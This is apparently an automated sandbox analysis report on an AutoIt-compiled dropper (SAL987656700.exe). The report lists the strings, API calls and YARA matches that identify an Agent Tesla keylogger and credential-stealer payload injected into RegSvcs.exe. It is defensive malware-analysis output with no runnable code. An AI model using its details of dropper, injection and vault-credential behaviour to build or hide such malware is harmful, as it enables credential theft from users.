                    Source: SAL987656700.exe, 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_a6328b78-8
                    Source: SAL987656700.exe, 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_e25598c6-0
                    Source: cunila.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: cunila.exe, 00000002.00000002.2046156947.00000000005E2000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_2367c13d-1
                    Source: cunila.exe, 00000002.00000002.2046156947.00000000005E2000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_c282a4ae-c
                    Source: cunila.exe, 00000005.00000002.2189121086.00000000005E2000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_3ff0ba67-c
                    Source: cunila.exe, 00000005.00000002.2189121086.00000000005E2000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_36ec0b64-0
                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_00883170 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,0_2_00883170
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_0091A2D7 NtdllDialogWndProc_W,0_2_0091A2D7
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_009187B2 NtdllDialogWndProc_W,CallWindowProcW,0_2_009187B2
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_00918AAA NtdllDialogWndProc_W,0_2_00918AAA
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_00898BA4 NtdllDialogWndProc_W,0_2_00898BA4
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_00918B02 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,0_2_00918B02
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_00918D0E PostMessageW,GetFocus,GetDlgCtrlID,NtdllDialogWndProc_W,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,0_2_00918D0E
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_00918FC9 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,0_2_00918FC9
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008990A7 NtdllDialogWndProc_W,0_2_008990A7
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_009190A1 SendMessageW,NtdllDialogWndProc_W,0_2_009190A1
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_00899052 NtdllDialogWndProc_W,0_2_00899052
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_0091911E DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,0_2_0091911E
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_00919380 NtdllDialogWndProc_W,0_2_00919380
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_009193CB NtdllDialogWndProc_W,0_2_009193CB
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_00919400 ClientToScreen,NtdllDialogWndProc_W,0_2_00919400
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_0091953A GetWindowLongW,NtdllDialogWndProc_W,0_2_0091953A
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_00919576 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00919576
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008997C0 GetParent,NtdllDialogWndProc_W,0_2_008997C0
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_0089997D NtdllDialogWndProc_W,GetSysColor,SetBkColor,745AC8D0,NtdllDialogWndProc_W,0_2_0089997D
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_00919EF3 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,0_2_00919EF3
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_00919E74 NtdllDialogWndProc_W,0_2_00919E74
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_00919F86 GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,0_2_00919F86
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_00523170 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,2_2_00523170
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_005BA2D7 NtdllDialogWndProc_W,2_2_005BA2D7
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_005B87B2 NtdllDialogWndProc_W,CallWindowProcW,2_2_005B87B2
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_005B8AAA NtdllDialogWndProc_W,2_2_005B8AAA
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_005B8B02 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,2_2_005B8B02
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_00538BA4 NtdllDialogWndProc_W,2_2_00538BA4
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_005B8D0E PostMessageW,GetFocus,GetDlgCtrlID,NtdllDialogWndProc_W,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,2_2_005B8D0E
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_005B8FC9 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,2_2_005B8FC9
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_00539052 NtdllDialogWndProc_W,2_2_00539052
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_005390A7 NtdllDialogWndProc_W,2_2_005390A7
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_005B90A1 SendMessageW,NtdllDialogWndProc_W,2_2_005B90A1
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_005B911E DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,2_2_005B911E
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_005B93CB NtdllDialogWndProc_W,2_2_005B93CB
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_005B9380 NtdllDialogWndProc_W,2_2_005B9380
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_005B9400 ClientToScreen,NtdllDialogWndProc_W,2_2_005B9400
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_005B9576 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_005B9576
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_005B953A GetWindowLongW,NtdllDialogWndProc_W,2_2_005B953A
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_005397C0 GetParent,NtdllDialogWndProc_W,2_2_005397C0
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_0053997D NtdllDialogWndProc_W,GetSysColor,SetBkColor,745AC8D0,NtdllDialogWndProc_W,2_2_0053997D
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_005B9E74 NtdllDialogWndProc_W,2_2_005B9E74
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_005B9EF3 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,2_2_005B9EF3
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_005B9F86 GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,2_2_005B9F86
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008ED5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_008ED5EB
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008E1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,74745590,CreateProcessAsUserW,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,0_2_008E1201
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008EE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_008EE8F6
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_0058E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_0058E8F6
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008F20460_2_008F2046
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008880600_2_00888060
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008E82980_2_008E8298
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008BE4FF0_2_008BE4FF
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008B676B0_2_008B676B
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_009148730_2_00914873
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008ACAA00_2_008ACAA0
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_0088CAF00_2_0088CAF0
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_0089CC390_2_0089CC39
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008B6DD90_2_008B6DD9
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008891C00_2_008891C0
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_0089B1190_2_0089B119
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008A13940_2_008A1394
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008A17060_2_008A1706
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008A781B0_2_008A781B
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008A19B00_2_008A19B0
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008879200_2_00887920
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_0089997D0_2_0089997D
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008A7A4A0_2_008A7A4A
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008A7CA70_2_008A7CA7
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008A1C770_2_008A1C77
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008B9EEE0_2_008B9EEE
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_0090BE440_2_0090BE44
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008A1F320_2_008A1F32
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_013958480_2_01395848
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_005920462_2_00592046
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_005280602_2_00528060
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_005882982_2_00588298
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_0055E4FF2_2_0055E4FF
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_0055676B2_2_0055676B
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_005B48732_2_005B4873
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_0052CAF02_2_0052CAF0
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_0054CAA02_2_0054CAA0
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_0053CC392_2_0053CC39
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_00556DD92_2_00556DD9
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_0053B1192_2_0053B119
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_005291C02_2_005291C0
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_005413942_2_00541394
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_005417062_2_00541706
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_0054781B2_2_0054781B
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_0053997D2_2_0053997D
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_005279202_2_00527920
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_005419B02_2_005419B0
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_00547A4A2_2_00547A4A
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_00541C772_2_00541C77
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_00547CA72_2_00547CA7
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_005ABE442_2_005ABE44
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_00559EEE2_2_00559EEE
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_0052BF402_2_0052BF40
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_00541F322_2_00541F32
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_015CA4082_2_015CA408
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00A1D4BA3_2_00A1D4BA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00A14A883_2_00A14A88
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00A1ECD83_2_00A1ECD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00A13E703_2_00A13E70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00A141B83_2_00A141B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_051AC6003_2_051AC600
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_051AAD783_2_051AAD78
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05F524403_2_05F52440
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05F566C03_2_05F566C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05F5B3183_2_05F5B318
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05F552703_2_05F55270
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05F5C2703_2_05F5C270
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05F57E503_2_05F57E50
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05F5E4783_2_05F5E478
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05F577703_2_05F57770
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05F500403_2_05F50040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05F559C03_2_05F559C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05F500333_2_05F50033
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05F500063_2_05F50006
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 5_2_01327E305_2_01327E30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E141B86_2_00E141B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E14A886_2_00E14A88
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E1AD986_2_00E1AD98
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E13E706_2_00E13E70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0622C3806_2_0622C380
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0622AAE86_2_0622AAE8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_062A56706_2_062A5670
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_062A66C06_2_062A66C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_062A24406_2_062A2440
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_062AC2706_2_062AC270
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_062AB3186_2_062AB318
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_062A7E506_2_062A7E50
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_062A77706_2_062A7770
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_062AE4786_2_062AE478
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_062A00406_2_062A0040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_062A5DC06_2_062A5DC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_062A001F6_2_062A001F
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: String function: 00529CB3 appears 31 times
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: String function: 0053F9F2 appears 40 times
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: String function: 00540A30 appears 46 times
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: String function: 008A0A30 appears 46 times
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: String function: 0089F9F2 appears 40 times
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: String function: 00889CB3 appears 31 times
                    Source: SAL987656700.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: 5.2.cunila.exe.39b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 5.2.cunila.exe.39b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 5.2.cunila.exe.39b0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 5.2.cunila.exe.39b0000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 3.2.RegSvcs.exe.3b0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 3.2.RegSvcs.exe.3b0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 2.2.cunila.exe.3970000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 2.2.cunila.exe.3970000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 2.2.cunila.exe.3970000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
